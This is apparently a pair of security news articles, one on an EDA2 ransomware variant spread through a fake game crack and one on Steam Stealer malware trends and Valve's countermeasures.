It is one of the educational ransomware developed by the security expert Utku Sen, now a new variant of the EDA2 educational ransomware appeared in the wild and the good news is that this variant is quite easy to neutralize.
The EDA2 ransomware encrypts victims’ files using AES encryption, then it appends the .locked extension to them. In a way similar to other ransomware, EDA2 also drops notes on the infected machines and informs users that they need to pay .5 bitcoins to restore their files.
According to the experts at Bleeping Computer, the educational ransomware has already infected more than 650 machines and the analysis of the Bitcoin address associated with the ransom request revealed that only 3 victims have paid.
The crooks are targeting online gamers, the EDA2 educational ransomware spread via a link associated with a YouTube video that explains how to crack the Far Cry Primal videogame. When victims try to execute the file crack are infected by the ransomware that encrypts users’ files.
The author of the malware in a bold manner writes in the note that he would never get caught by the authorities.
Utku Sen, the developer that created the educational ransomware, seems to have deliberately inserted security flaws in both the Hidden Tear and EDA2 to sabotage cyber criminals using the proof-of-concept ransomware.
The Sen’s plan worked with the Hidden Tear allowing the recovery of the file encrypted by the Linux.Encoder and Cryptear.B ransomware, meanwhile failed with EDA2.
The developer also inserted vulnerabilities in the EDA2’s control script in order to retrieve decryption keys allowing victims to restore their files.
The keys are then published online giving the opportunity to the victims to restore their files by using the Hidden Tear Decryptor.
Other educational ransomware developed by the Hidden Tear are Magic, Linux.Encoder, and Cryptear.B, all these threats were deliberately affected by a flaw that allows researchers easily to decrypt documents.
Malware targeting Steam accounts, a growing business
16.3.2016 Virus
Security expert published an interesting analysis of malware targeting the Steam gaming platform and evolution of threats through the last few years.
It is emergency, malware targeting the Steam accounts are increasing as never before over the last months. The popular gaming platform is a privileged target for cyber criminals, Steam is owned by Valve and account for nearly 140 million users. The company estimates that nearly 77,000 accounts are hijacked and pillaged each month.
“We see around 77,000 accounts hijacked and pillaged each month. These are not new or naïve users; these are professional CS:GO players, reddit contributors, item traders, etc. Users can be targeted randomly as part of a larger group or even individually. Hackers can wait months for a payoff, all the while relentlessly attempting to gain access. It’s a losing battle to protect your items against someone who steals them for a living.” states the company in a blog post.
The security expert at Kaspersky Lab, Santiago Pontiroli, and Bart P, an independent security researcher, published an interesting analysis of malware targeting the Steam gaming platform and evolution of threats through the last few years.
In the recent months, the researchers observed a spike in the infections caused by a data stealer specifically designed to target the accounts on the gaming platform, dubbed Steam Stealer.
Steam Stealer first appeared on a forum in the Russian underground, it is advertised as a customizable threat that is offered for sale with upgrades and manuals.
“Adding new features is simple. The average developer just needs to select their favorite programming language and know just enough about Steam’s client design and protocol. There are many APIs and libraries available that interface seamlessly with the Steam platform, significantly reducing the effort required.” states the analysis.
The crooks use to spread the Steam stealer malware via bogus websites or sending direct messages to victims.
Steam stealer is very cheap, the cost of a build ranges from $3 and goes up to $30 USD, some sellers offer it as a malware-as-a-service tools.
“However, when it comes to these types of malicious campaigns we usually see prices starting in the range of $500 dollars (taking as a reference earlier ransomware-as-a-service markets).” explained Pontiroli and Bart P.
The researchers noticed a significant difference in the way criminals dropped the malware over the time. In the past they served the malware on users via URL shortening services, cloud storage services like Dropbox and Google Docs, and phony game servers and fake voice software sites. Recently attackers started using fake Chrome extensions and gambling sites.
A short rundown of past trends:
Use of obfuscators to make analysis and detection harder.
Use of file extensions hidden by default by Windows (fake ‘screensaver’ files).
Use of NetSupport added (providing remote access to the attacker).
Use of fake TeamSpeak servers.
Use of automatic Captcha bypass (DeathByCaptcha and others).
Use of fake game servers (Counter-Strike: Global Offensive most notably).
Use of Pastebin to fetch the actual Steam Stealer.
Use of fake screenshot sites impersonating Imgur, LightShot or SavePic.
Use of fake voice software impersonating TeamSpeak, RazerComms and others.
Use of URL shortening services like bit.ly.
Use of Dropbox, Google Docs, Copy.com and others to host the malware.
Current trends are as follows:
Use of fake Chrome extensions or JavaScript, scamming via gambling websites.
Use of fake gambling sites, including fake deposit bots.
Use of AutoIT wrappers to make analysis and detection harder.
Use of RATs (Remote Access Trojans) such as NanoCore or DarkComet.
The experts explained that there are counter-measure that the Valve’s Steam has implemented to prevent attacks on its accounts including:
Two-factor authentication either by email or mobile application.
Blocking URL’s throughout Steam.
Nickname censorship (Steam/Valve).
Captcha on trades (briefly), and then bypassed.
Limited accounts introduced.
Steam e-mail confirmations for utilizing the market and trading items.
Verifying e-mail address.
$5 USD purchase to combat ‘free abuse’ accounts (expanded on limited accounts).
Information about who you are trading with (record).
Market will become blocked when logging in from new devices, changing your profile password etc.
Steam mobile trade confirmations.
Steam account recovery via phone number.
Restrict chat from users who do not share a friends, game server, or multi-user chat relationship with you.
More restrictive block referral of spam and scam sites.
Trade hold duration (15 days).
The experts explained that Steam implemented the above measured as a deterrent.
“We have listed all the options Steam offers users to protect their accounts. Remember that cybercriminals aim for numbers and if it’s too much trouble they’ll move on to the next target. Follow these simple recommendations and you will avoid becoming the low hanging fruit.”
No doubt, the number of attacks against the platform will continue to increase despite the effort spent by the company.
